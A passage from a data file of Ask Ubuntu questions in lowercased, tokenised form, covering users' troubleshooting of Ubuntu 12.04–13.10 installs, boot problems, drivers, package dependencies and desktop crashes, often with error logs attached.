437948	ramdisk not in ram ( ubuntu 12.04 )	i followed this post to create a ramdisk . after that , when i copy a file to the directory , the file was copied , but memory usage as shown in gnome-system-monitor does not increase . also , i tried reading the copied file from that directory but the speed is still as slow as reading a disk file . what did i do wrong ? edit : i was wrong and the ramdisk ( with either tmpfs or ramfs ) had the files in memory . the free -m command does show this , while the gnome-system-monitor will not show it . also ramfs popup as a mounted drive in nautilus but tmpfs does not . however , in my case i need to do chmod on the ramdisk folder before i can copy files in , even if the ramdisk mount folder is in my home directory .
437950	mysql installation error	i 'm trying to install mysql like this : sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql but i get this always : reading package lists ... done building dependency tree reading state information ... done mysql-server is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libapache2-mod-auth-mysql : depends : apache2.2-common ( > = 2.2.3-3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . please help me ! i 'm using ubuntu 12.04 64 bit
437952	i 'm a total noob and need to know if ubuntu will work properly in my laptop	so , as the title says : i 'm not very tech savvy , but i tried ubuntu and loved it ! the thing is : i do n't know if my laptop can handle ubuntu or if i need to do something special to make it work properly ( like drivers or some other add-on ) . samsung 300e4a , currently running win 7 . 500 gb hard drive , 8gb ram , intel ( r ) hd graphics , realtek high definition audio
437953	12.04 to 13.10 can it remove encryption ?	i installed ubuntu 12.04 on my primary computer , and i absentmindedly selected `` encypt home directory '' i read a few methods to de-encrypt it , but they did n't work so well ( and seemed overly complicated ) if i upgrade from 12.04 to 13.10 will it remove the home directory encryption if i do not select it ? thanks in advance ! ! ~nate
437956	'grub ' failing to install into /dev/sda	i have a trying to install ubuntu 12.04 server lts on a brand new computer with no operating system currently on it . i am using a usb flash drive to install ubuntu . whenever it starts to install grub into /dev/sda , i keep getting `` grub /dev/sda failed . this is a fatal error '' message . how do i correct this issue so that grub will install into the mbr ? any help will be appreciated .
437958	steam forgets where game directory is on second hdd	i installed steam onto my ssd , but of course that ca n't hold very many games so i setup a second steam directory on my hdd . however every single time a i restart my computer steam shows all my games in the directory as being uninstalled . however , when i click install i can navigate to the directory i made , select it , then all my steam games once again appear as installed . how do i fix this . ubuntu 13.10
437962	routing issues with ubuntu server	so i have a dilemma . i have a router that currently has a static ip as well as three vms running ubuntu server that also have individual static ips . i have 2 nic cards on the server though and would like to enable the second as a backend network in which to interface with any additional vms i may launch as they will not have static internet facing ips . both networks go would go through the same router , but would have different gatways as one is a static ifacing setup and the other would be local setup . problem is whenever i plug in my local network which is currently set to dhcp i can no longer access anything over the interwebz through my static ip any suggestions ?
437964	reinstallation libglib2.0-0 is not possible , it can not be downloaded	ubuntu version : ubuntu 12.04.4 lts . i 'd like to reinstall libglib2.0-0 with the hope that it would solve an issue with another library ( libgdk-pixbuf2.0-0 ) . but i get : sudo apt-get install -- reinstall libglib2.0-0 reading package lists ... done building dependency tree reading state information ... done reinstallation of libglib2.0-0 is not possible , it can not be downloaded . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how can i fix this ? this question is related to : https : //bugs.launchpad.net/ubuntu/+source/gdk-pixbuf/+bug/1174253 ( currently trying to fix this bug )
437966	php sqlite not working in 13.10	according to > ls /etc/php5/mods-available/ i have a pdo.ini pdo_mysql.ini pdo_sqlite.ini sqlite3.ini for example sqlite.ini contains : ; configuration for php sqlite module ; priority=20 extension=sqlite3.so and > php -i | grep pdo_ gives : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20121212/pdo_sqlite.so ' - /usr/lib/php5/20121212/pdo_sqlite.so : undefined symbol : sqlite3_column_table_name in unknown on line 0 /etc/php5/cli/conf.d/20-pdo_mysql.ini , /etc/php5/cli/conf.d/20-pdo_sqlite.ini , simple stuff like this : < ? php echo sqlite_libversion ( ) ; ? > gives a blank page . also phpliteadmin wo n't work either , complaining of no sqlite3 or pdo_sqlite , etc . been all over this planet 's internet chasing leads and clues to no avail . what 's wrong ?
437973	how to check my home directory is encrypted in ubuntu 12.04	i am using xubuntu 12.04 and i want to be sure my home directory is encrypted . i have .ecryptfs in my home directory and other positive signs of encryption and had selected it during installation . but when i boot up computer and login as root in the console 1 without logging into my actual account , and try cd /home/myusername/ i can see all the files ? is this correct behaviour since the home directory will be mounted only when i login as 'myusername ' or does root has access to all encrypted home directories ?
437975	ubuntu 12.10 blank after login -- images/icons ca n't be displayed	i rebooted my 12.10 ( linux ubuntu 3.2.0-60-generic # 91-ubuntu smp wed feb 19 03:55:18 utc 2014 i686 i686 i386 gnu/linux ) which has been running fine for many months after a thunderbird update and found the icons had suddenly changed and a few were missing on the login screen . after logging in the screen was blank , no background image , no launcher , no task bar . i went into a shell and tried unity -- reset and -- reset-icons but that failed . -- reset produced : warning : unity currently default profile , so switching to metacity while resetting the values window manager warning : failed to load theme `` ambiance '' : line 195 character 94 : could n't recognize the image file format for file '/usr/share/themes/ambiance/metacity-1/trough_left.png' unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x2800003 compiz ( core ) - warn : failed to receive configurenotify event on 0x2800007 compiz ( core ) - warn : failed to receive configurenotify event on 0x2e000b1 compiz ( core ) - warn : failed to receive configurenotify event on 0x2400005 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1516:46 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1521:55 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1525:58 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1529:55 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1533:64 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1537:67 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1595:73 : could n't recognize the image file format for file '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle_vertical.png' ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1612:64 : could n't recognize the image file format for file '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle.png' ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:769:55 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:773:55 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:777:67 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:781:64 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:785:64 : unrecognized image file format ( compiz:4230 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:789:76 : unrecognized image file format ( compiz:4230 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed warn 2014-03-22 17:42:37 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubiquity-gtkui.desktop' error 2014-03-22 17:42:37 nux.image gdkgraphics.cpp:68 could n't recognize the image file format for file '/usr/share/unity/5/dash_noise.png' warn 2014-03-22 17:42:37 nux.image gdkgraphics.cpp:80 no pixbuf loaded segmentation fault i then reinstalled compiz , ubunutu-desktop , no change . i was able to get `` gnome-panel '' up so i had some gui but several icons are missing but the services are running . the windows can not be resized and i am unable to save screen shots to anything , even though i can read/write via terminal . when i launch firefox for example it generates a `` sys_page_size=0 '' error and can not be resized properly . i have to connect with the cli to wifi because there seems to be no indicator for network-manager . i do see a lot of these : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:773:55 : unrecognized image file form /var/log/syslog shows : mar 22 05:45:28 ubuntu kernel : [ 376.763327 ] compiz [ 3062 ] : segfault at 0 ip 013 8d46f sp bfa59ea0 error 4 in libunityshell.so [ 11b8000+2ff000 ] mar 22 05:45:31 ubuntu kernel : [ 379.209530 ] compiz [ 3161 ] : segfault at 0 ip 015 5d46f sp bffc9200 error 4 in libunityshell.so [ 1388000+2ff000 ] mar 22 05:46:11 ubuntu kernel : [ 418.939940 ] compiz [ 3353 ] : segfault at 0 ip 04f 5346f sp bfee65b0 error 4 in libunityshell.so [ 4d7e000+2ff000 ] any ideas ? i do n't know what is going on here and my system is pretty hosed . i would like to find a fix for this rather than download a new image which will take days if i 'm lucky . tia . edit # 1 : i 've been running kernel 3.2.0-60 for months and i 've dropped back to 3.2.0-59 but no change in the situation . one thing i discovered is that gtk can no longer read images ( png , jpg , etc. ) . i ca n't open images that i know are valid and none of the desktop images seem to load : ( gnome-panel:2954 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1612:64 : could n't recognize the image file format for file '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle.png' this could be part of the problem with why icons , task bar , etc . are failing to show . does anyone have an idea of what i could try to correct these problems ? for example if i try to view a known good jpg with eog from the cli i get this string of messages and eog opens to a empty ( black ) image with an error `` unrecognized image file format '' . the command errors are : ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1516:46 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1521:55 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1525:58 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1529:55 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1533:64 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1537:67 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1595:73 : could n't recognize the image file format for file '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle_vertical.png' ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1612:64 : could n't recognize the image file format for file '/usr/share/themes/ambiance/gtk-3.0/assets/scrollbar_handle.png' ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:769:55 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:773:55 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:777:67 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:781:64 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:785:64 : unrecognized image file format ( eog:3842 ) : gtk-warning ** : theme parsing error : gtk-widgets-backdrop.css:789:76 : unrecognized image file format ** ( eog:3842 ) : critical ** : failed to load icon 'lpi-help ' : unrecognized image file format ( eog:3842 ) : gtk-critical ** : gtk_icon_theme_load_icon : assertion `error == null || *error == null ' failed ** ( eog:3842 ) : critical ** : failed to load icon 'lpi-translate ' : unrecognized image file format edit # 2 : mr. lee was correct https : //bugs.launchpad.net/ubuntu/+source/gtk+3.0/+bug/1295220 was one of my problems because i had to use gfvs before there was a ubuntu ppa for it . this was causing part of my problem with images/icons missing . however i still need to drop to a terminal and run `` gnome-panel '' to bring up the taskbar ( no launcher appears , unable to resize or move windows ) and running gnome-panel produces this error : *** bug *** in pixman_region32_init_rect : invalid rectangle passed set a breakpoint on '_pixman_log_error ' to debug **strong text** at least it is mostly functional once i run gnome-panel . however i 'm not sure what is still wrong with unity . not being able to resize or move windows or have at the left side launcher bar means something is still really confused . edit # 3 : in the end mr. lee 's solution via the bugfix and running `` unity -- reset '' restored the desktop properly and now boots up properly without the help of gnome-panel .
437976	usb 3.0 not working in asus k53sv	i have ubuntu 12.04 amd64 running on my asus k53sv . every thing works fine except usb 3.0 port but in windows usb 3.0 works . lsusb output : $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 13d3:5710 imc networks bus 001 device 005 : id 0bda:0139 realtek semiconductor corp . bus 002 device 005 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard bus 002 device 003 : id 0781:557e sandisk corp. help me in fixing it .
437981	facing touch pad mouse pointer struck problem in lenovo g580 laptop for ubuntu 12.04.03lts	i have installed ubuntu 12.04.03 in my lenovo g580 laptop . i am facing the problem of mouse pointer struck if i use touch pad but not in external/bluetooth mouse . each time i need to restart my laptop when it got struck . could you please let me know should i need to install additional driver to over come this problem or is there any bug in 12.04.03 ?
437983	how to find backlight is managed by which card ?	is there any command in ubuntu/linux which can help me in finding out that which card ( intel or ati card ) is managing my backlight ? when i looked at sys/class/backlight then i am able to find three different folders/symbolic links . ( acpi_video0 , acpi_video1 , intel_backlight ) . i am new to linux world , so if you think question is too basic then i would appreciate if you could refer me some book/webpage/tutorial where i could update myself quickly .
437985	ubuntu 12.04 no longer boots on toshiba satellite after windows upgrade	i have a toshiba satellite l855-s5372 , which came pre-installed with windows 8 . i succeeded to install ubuntu 12.04 on it ( intending to dual-boot ) , but the uefi refused to recognize it and went to windows every time . i found a very hackish work-around : every time i want linux , i go into f2 setup at startup and disable secure boot . recently , after an upgrade on the windows side , this method has stopped working , it goes to windows every time regardless of secure boot option . i have spent an hour with the setup to no avail . how can i boot linux , and how can i continue to dual-boot windows and ubuntu ?
437986	ubuntu mouse not working well and everything is running slowly on good computer . ( i5 , 8gb , 7950 )	i am giving ubuntu a try . here is the process i went through . i first installed it following this guide . i put the files on one usb and then installed them onto another . my mouse was moving around the screen just fine and once and a while would be able to click on something but then it either did nothing or took a very long time to load . i looked it up and discovered usbs arent super great for running ubuntu . so i then installed it onto a 500gb wd hdd . i got the same results if not worse . please help me out . i would love to support open source but wont be able to if i cant get past these first steps . edit : fixed see comments
437987	problem installing rhythmbox v3 on 13.10	err http : //ppa.launchpad.net/jacob/media/ubuntu/ saucy/main rhythmbox amd64 3.0.1-1ubuntu5~ppa0 connection failed err http : //ppa.launchpad.net/jacob/media/ubuntu/ saucy/main rhythmbox-mozilla amd64 3.0.1-1ubuntu5~ppa0 connection failed this is the error i get when i try to install rhythmbox v3 . what should i do ? below is the output of apt-cache policy rhythmbox rhythmbox : installed : ( none ) candidate : 3.0.1-1ubuntu5~ppa0 version table : 3.0.1-1ubuntu5~ppa0 0 500 ppa.launchpad.net/jacob/media/ubuntu saucy/main amd64 packages 100 /var/lib/dpkg/status 3.0-1~ppafossfreedomubuntu7 0 500 ppa.launchpad.net/fossfreedom/rhythmbox/ubuntu saucy/main amd64 packages 2.99.1-0ubuntu1 0 500 in.archive.ubuntu.com/ubuntu saucy/main amd64 packages output of sudo apt-get install rhythmbox err ppa.launchpad.net/jacob/media/ubuntu saucy/main rhythmbox amd64 3.0.1-1ubuntu5~ppa0 connection failed 0 % [ waiting for headers ] i tried removing the ppa , and after that i ran sudo apt-get install rhyhmbox . now its showing this . the following packages have unmet dependencies : rhythmbox : depends : librhythmbox-core8 ( = 3.0-1~ppafossfreedomubuntu7 ) but 3.0.1-1ubuntu5~ppa0 is to be installed depends : rhythmbox-data ( = 3.0-1~ppafossfreedomubuntu7 ) but it is not going to be installed recommends : gstreamer1.0-plugins-ugly but it is not going to be installed recommends : rhythmbox-plugins but it is not going to be installed e : unable to correct problems , you have held broken packages .
437988	completely remove the broken installation and merge its partition	i have 2 bootable installations , one of them is broken , meaning i ca n't boot it but it does appear in the boot menu . i want to completely remove the broken one and merge its partition with the my current installation . how can i do this safely ? update : i ca n't figure out how to merge sda1 and sda6 , sda6 being my main partition .
437991	unable to mount my android 4.4 in ubuntu 12.04	i bought the phone which has android 4.4 version and i am using ubuntu 12.04 and i am unable to connect this to my pc .
437992	wine exists even after purging	i am trying to build and install the development release of wine i.e v1.7.0-15 from source . first i tried to install it by executing cd ./wine1.7.0-15 ./tools/wineinstall which gave an message warning ! ! wine binary ( still ) found , which may indicate a ( conflicting ) previous installation . you might want to abort and uninstall wine first . ( if you previously tried to install from source manually , run 'make uninstall ' from the wine root directory ) i ignored the message and continued the compilation+installation . but when the process was completed , the command apt-show-versions wine showed that version 1.4 is installed which can be upgraded to 1.7 . so now i purged wine , and manually deleted wine folder ( .wine ) . then i tried installing wine1.7 again but i still see the message and if i ignore it , wine is not installed.while apt-show-versions wine gives wine not installed and sudo apt-get install wine suggests to install wine 1.7.i have removed all wine related packages.bu to no avail . how can i install wine from source now ?
437994	how to clean install ubuntu 64 bit on uefi/efi mode	i have a problem to install ubuntu 12.04.3 lts 64 bit and latest on my netbook ( lenovo thinkpad edge e125 ) in uefi or efi mode . i had try to disable the efi mode on firmware ( bios ) too . also , i did followed what a few people or blogs says . even the distribution linux group . i 'd been try the boot-repair and pointing grub or grub2 to sda1 ( as ufi boot partition ) and a few scripts as they says , but still the problems did n't resolved ( boot loader did not load - operating system did not found ) . what i 'm doing is trying to clean install 64 bit linux on my netbook ( specs : amd e-450 , 8gb ram ) with or without uefi/efi mode . and ubuntu would the only os on my netbook . i did not try to upgrade my bios firmware yet . if anybody does know how to fix it , i would appreciate .
437995	rhythmbox save current song after exit	how can set rhythmbox to save automatically the current song when exiting ? the scenario : i have the following playlist song 1 song 2 [ playing ] song 3 song 4 song 2 is playing . i exit rhythmbox ( i close it or i power off the computer ) . when i start the application again ( e.g . after powering on the computer ) it plays song 1 . how can i set it to play song 2 ?
437996	i want to install ubuntu 32 bits	i have downloaded ubuntu iso for 32 & 64 bits . i have also made a bootable usb . i have created a separate partition to install ubuntu and want to install ubuntu 32 bits os . i am facing this two main issue . pls help i tried to install using wubi installer as you through windows explorer but it always downloads 64 bit os even though i click on wubi of 32 bits . when i connect my bootable pd of 32 bits and turn off my internet then it down loads files from my pd to install ubuntu . but the problem it gives is that is shows my partitions to be used up to more than 10 gb though it has only install only os on it so i cancelled the installation . is it bcoz i select the disk size 25 gb . and my two more questions are does 64 bit ubuntu slows your system . i have ram of 2 gb on dual core proccessor . i want to also keep my other 32bit os along with ubuntu . can i install ubuntu alongside windows but in the other partition that i have created as mentioned above , through bootable pd when it pops up option install ubuntu . i tried to find the option but it always tells me to allocate space in the drive which has os installed in it .
437997	networking service broke my computer	i 've entered in terminal `` sudo service networking stop '' . than graphic interface crashed and after restarting i ca n't login into my main profile . well i '' able to login from tty 1-6 , but on seventh after entering password and clicking login i 'm returned to my lightdm in a few seconds . how to fix the system ?
437998	no errors but some wanings in xorg.0.log file , however x still black screen ! help please , ati driver	my desktop is asus a43 with amd radeon hd 6730m graphics.recently i installed the ubuntu12.04 system and i find that my cpu has a high tempreture since booted.so i realized there must be some wrong with my graphics . i had tryed every method to install the fglrx , such as install the lastest official catalyst driver and the open source catalyst driver but it always return me a black screen . now there is no errors in xorg.0.log file , and i do n't know how to solve.if you have some suggestions or methods , thanks very much . my xorg.conf file is : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection and my xorg.0.log file is : xorg.0.log
437999	can not boot my ubuntu 12.04	description of the problem : when i choose the operating system in the grub menu to ubuntu i see only a purple screen and nothing happens . i 've tried to load the `` recovery mode '' , it is working , but i do not know what should i write there to boot the os . i have this problem on my hp g62 laptop , intel corei5 1,89x2mhz ; 6gb ram ; ati radeon video ( mixed with chip set ) and also i have windows 7 installed separately on my laptop . let me know if more information is needed . thank you for your help .
438000	can not install gnome extensions	currently having issues installing gnome extensions via their website . usually there is a slider bar that says on/off , but i am unable to see it . i am running firefox 28.0 along with ubuntu 12.04 . i have disabled all addons and still nto able to see anything . i have gnome 3.4.1 installed and gnome tweak tool as well . i am able to install gnome extensions from the terminal when i know the exact adress or command line . also , when i view the webiste it looks like the plugin list icons are sort of grayed out or transparent . when i compare this to screenshot below , they are much brighter and this makes me wonder if this indicates a problem . here is the normal image : here is what i see : i have read how to install gnome shell extensions with no luck thanks for reading .
438002	best vnc/remote desktop application ?	i have been looking for a fast , well supported vnc or remote desktop application to view my windows machine desktop from my ubuntu laptop . any suggestions for me ?
438003	vpnc can not find device `` tun0 ''	i am trying to connect to my work vpn with vpnc , on my chromebook with ubuntu 12.04.4 ( 64bit ) . i have installed vpnc , and when i run it , after entering my user/password , i get the following errors : can not find device `` tun0 '' can not find device `` tun0 '' can not find device `` tun0 '' can not find device `` tun0 '' resolvconf : error : /run/resolvconf/interface either does not exist or is not a directory can anyone suggest why it can not find this tun0 device , or how i should proceed from here ? do i need to install something such that tun0 can be found ?
438005	boot-repair -- - recovering ubuntu after installing windows 8	i would like to recovere ubuntu after installing windows 8 . i have installed boot repair to recover grub but after reebot it does not show up grub . the url after running boot-repair is this .
438006	xen4.3 hypervisor on ubuntu 13.10 not booting properly - black screen	i know this seems to be an issue going as far back as ubuntu 11 and xen 4.0 . i have seen the posts online and have attempted the suggested solutions i could find ( disabling gdm and xserver at boot , have xen only use 1vcpu and only 1gb ram , and i think there was a few others ) . i 'm trying to setup a lab environment using xen within ubuntu . i have everything configured properly as far as i can tell . before i go into more description , hardware information i think is needed . motherboard : asus m5a99x evo r2.0 cpu : amd fx-8320 ( black edition ) eight core ram : 32 gb ddr3 ram boothd : boot/root hd is actually a 60gb ssd - setup as lvm during the install of ubuntu ) homehd : dedicated 100gb 2.5 '' sata2 drive for the home directory storagehdds : 4+ tb space configured via lvm video : radeon hd5450 - 1gb ( pci 2.1 ) this is not a dual boot system . ubuntu 13.10 installed . kvm seems to work okay - have n't really given it a full test as i 'm not familiar with kvm and do n't want to introduce more complexity to the situation ( using this to study for ms certification exams - and will be used to house a few other vm 's for the wife and myself ) . when i choose the xen hypervisor from grub , it starts to load then goes to a black screen . i changed my grub settings to show the entire output ( disabled the quiet splash screen ) . initially , i was getting messages regarding soft-locked up cpu 's ( seemed random ) . disabled the option in the bios that allows the motherboard to automatically control which cores were active or disabled - set them all to enabled . this solved the issue regarding the soft lockup . however it still does n't boot . it goes a bit further then just seems to halt . first indicator of errors : setup 000.00.18.0 for d0 failed ( -19 ) ( this is repeated about 6 or 7 times , but it goes by quickly and i cant seem to pause the output quick enough before it moves forward ) . the last bit of output is as follows : [ 7.765403 ] usb usb6 : product : ohci pci host controller [ 7.765466 ] usb usb6 : manufacture : linux 3.11.0-18-generic ohci_hcd [ 7.765530 ] usb usb6 : serialnumber : 0000:00:14.5 [ 7.765812 ] hub 6-0:1.0 usb hub found [ 7.765883 ] hub 6-0:1.0 2 ports detected [ 7.766360 ] already setup the gsi :22 [ 7.766458 ] ohci-pci 0000:00:16.0 : ohci pci host controller [ 7.766528 ] ohci-pci 0000:00:16.0 : new usb bus registered , assigned bus number 7 [ 7.766670 ] ohci-pci 0000:00:16.0 : irq 22 , io mem 0xfeb05000 this is where it hangs . i downloaded , burned , and ran alpine linux xen 4.x live cd - and this configured and ran fine . i have n't tried with xenserver 6.2 stand alone installation media yet , that will be something i try tomorrow . i would prefer to run it from ubuntu as that is something i am familiar with and can have a bit extra control when it comes to configuring . has anyone encountered this issue before and resolved it , or is this something that is constantly on going ? as i mentioned , i found other posts where there is an issue where booting up xen hypervisor results in a black screen , but the solutions provided have not worked for me .
438009	running ubuntu from external hard drive	hey everyone i 'm having issues with running ubuntu 13.10 off an external drive i have hooked up to my laptop ( hp dv6 windows 7 ) via usb . anyhow , i have ubuntu 13.10 installed on a hard drive which is inside an external hard drive enclosure . i know that installation was successful ( i.e . grub runs and boots it ) because i can boot from the external drive from public computers ( school desktops ) where i see the grub menu and simply run from there . i can further attest to this as my brother 's hp laptop which is just one year newer than mine can boot from the external hd , and i 've even been able to boot windows 7 from the external hd ( that 's a different story but the same principle i believe . ) however , when i have it connected to my laptop and set the bios to boot from the external hard drive , all i get is a black screen followed by nothing else happening - ubuntu is n't loaded and i have to hard restart my laptop . the only thing i 've been able to see is `` grub loading . '' when i hold the shift key upon attempting to boot from the external drive . someone please help ! i 've been trying to get this to work for a good 2 months with no luck . i can run the liveusb no problem as well . i initially thought it was a problem with the bios but with it being able to boot windows 7 from that very external drive leads me to believe otherwise . i 've even tried running boot-repair with no luck , simply causing the grub rescue screen to appear as opposed to a black screen . thanks in advance .
438010	issue : time is not in sync between ubunut and win8	i am using ubuntu 12.04 dual booting with win8.1 . recently i am noticing that whenever i boot alternative os the time is not the same i.e when i switch from ubuntu to windows , system time in windows gets delayed by some hours . but if i correct it and boot again to windows , the time displayed is right one . similarly , when i boot into ubuntu , the time is delayed once its corrected its alright the next time . i am using grub bootloader
438013	setting log=1 in /etc/environment	i asked a question earlier about viewing the history of notify-osd using the indicator-notifications app . the answer was that i needed to add log=1 in my /etc/environment file . that sounded suspicious and i did n't do it because : it 's in the global configuration file . you really ca n't know what else will be logged other than the notifications . i browsed around and saw this question which also highlights the issue . look specifically at this answer : small warning : this could be a bad idea ... log=1 in /etc/environment makes it a system wide variable and could break stuff ... god knows what reacts on log ( ofc . they should have made it something like notifyosdlog ) . maybe for starters i would add it to bashrc for 1 user just to be sure . my question is , how will setting log=1 in /etc/environment affect the system ? which 'stuff ' will be logged ? is this advisable ? edit i solved the notification issue and now i 'm just asking about the effects of setting log=1 in /etc/environment . look at my question above : `` how will setting log=1 in /etc/environment affect the system ? which 'stuff ' will be logged ? is this advisable ? ''
438016	two title bars for all windows	i have found that i have two title bars for all window screens . the attached images describe the problem , i can minimize or close the window from any title bar . note : the attached screenshots for maximized windows .
438024	video colors wrong 12.04 lts using vlc or movie player	does anyone have a fix for misrepresented video colors ? have searched askubuntu.com , have not found a solution that works . 12.04 lts displays video colors incorrectly using vlc or movie player . also when viewing videos on youtube , colors are wrong and frame is compressed horizontally . have installed flashplayer plugin from ubuntu software center , no change , apparently it 's not a browser problem . problem occurs in firefox or chromium , or viewing videos offline . everything else ( pictures , thumbnails , etc . ) shows correct colors , only videos are effected . when attempting to view a video in vlc the screen goes black as the cursor crosses in or out of the frame . i have installed xubuntu-restricted-extras package '' from ububtu software center , and adobe flash plugin . update : installed `` youtube all html5 2.1.1 '' per advice on ubuntuforums.org , chose the option to disable flash on youtube , that cleared up the online video problem . now i need to figure out how to fix the problem when using the offline viewers . update : found that the colors while viewing offline were not negative , just too strong giving that `` neon '' look . adjusted saturation , etc. , and got close to `` normal '' . hard to do with vlc , every time i move the mouse , the screen goes black . similar with movie player but i 'll figure it out . probably end up uninstalling vlc as it seems to be a lot of trouble to adjust . might try some other viewers . cancel red alert ! update : also found that moving or resizing the image window in movie player can bring the image back ( make the black go away ) .
438026	sed not found but already installed	i 'm using ubuntu 13.04 . i 'm trying to install ptxdist-2011.11.0 and when i run ./configure , it says it does n't find a sed version : checking sed version ... configure : error : we need at least gnu sed 4.x but when i run sudo apt-get install sed ... it 's already installed ( sed is already the newest version ) . i 've checked the version and it 's 4.2.2 . could anyone tell me what to do ? i ca n't change the ptxdist version .
438029	my computer is 32 bit windows xp , i downloaded ubuntu12.04lts -64 bit	i have windows xp -as per process it is 32 bit , i used wubi and downloaded ubuntu 12.04 lts 2 days ago-in details it shows 64 bit..it is working on my pc but i find small font for all i do on website . is this because 64 bit is downloaded on 32 bit ? pl guide and suggest way out . i have elementary knowledge of computers.should i uninstal 64 bits and have 32 bit ? pl give advice , thanks !
438031	how can i crop a 1920x1200 monitor to 1920x1080 ?	i have a 1920x1200 monitor , and have some situations where i want to force the output to the more common 1920x1080 . however , i do n't want to distort the output , and would prefer a `` cropping '' black bar at the bottom . using xrandr -- output dp1 -- mode 1920x1200 -- fb 1920x1080 does n't work correctly . the bottom 120 pixels are indeed removed , but the kde panel at the bottom of the screen is missing . then , after alt-tabbing , my windows become vertically squashed , and my mouse-clicks correspond to different ( unsquashed ) positions . some have suggested using xrandr fb and transform in the general case , but i can not understand how transform works . is this approach suitable for my case , and if so , what command would i use ? from man xrandr -- transform a , b , c , d , e , f , g , h , i specifies a transformation matrix to apply on the output . automati‐ cally a bilinear filter is selected . the mathematical form corre‐ sponds to : a b c d e f g h i the transformation is based on homogeneous coordinates . the matrix multiplied by the coordinate vector of a pixel of the output gives the transformed coordinate vector of a pixel in the graphic buffer . more precisely , the vector ( x y ) of the output pixel is extended to 3 values ( x y w ) , with 1 as the w coordinate and multiplied against the matrix . the final device coordinates of the pixel are then calculated with the so-called homogenic division by the transformed w coordi‐ nate . in other words , the device coordinates ( x ' y ' ) of the trans‐ formed pixel are : x ' = ( ax + by + c ) / w ' and y ' = ( dx + ey + f ) 